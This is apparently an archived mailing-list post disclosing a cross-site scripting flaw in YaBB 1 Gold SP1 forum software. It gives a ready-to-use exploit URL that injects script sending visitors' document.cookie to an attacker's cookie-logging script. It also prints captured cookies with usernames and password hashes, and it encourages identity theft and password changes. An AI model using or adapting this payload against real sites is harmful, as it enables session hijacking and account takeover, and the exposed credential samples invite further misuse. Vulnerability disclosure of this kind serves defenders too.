http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269>location%3d'http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>

 num is a post that doesn't exist
 board must be a valid and accessable board
 X.php script to log the cookie

 that in an example of the cookie
 268: YaBBusername=HellMind;
YaBBpassword=yyG8B.3TA6i6I
 272: YaBBusername=Canallaman;
YaBBpassword=yypZn/JbGHTNY

 Tested in YaBB 1 Gold - SP1!

 i discover this now, i know isnt much but u can do
 steal the user identity and maybe u can try to change
the password too (there is another old vuln but i dont
know if work here)

 Sorry for my bad english

 Bye

_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]